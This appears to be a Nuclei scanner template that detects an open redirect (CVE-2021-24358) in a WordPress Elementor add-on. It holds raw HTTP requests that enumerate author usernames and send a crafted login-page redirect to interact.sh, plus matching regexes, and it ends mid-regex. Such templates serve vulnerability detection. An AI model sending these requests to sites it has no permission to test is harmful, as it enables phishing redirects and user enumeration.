id: CVE-2021-24358 info: name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect author: dhiyaneshDk severity: medium description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue. reference: - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d - https://nvd.nist.gov/vuln/detail/CVE-2021-24358 - https://theplusaddons.com/changelog/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00255 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 framework: wordpress vendor: posimyth product: the_plus_addons_for_elementor tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor http: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - | GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 extractors: - type: regex name: username group: 1 regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?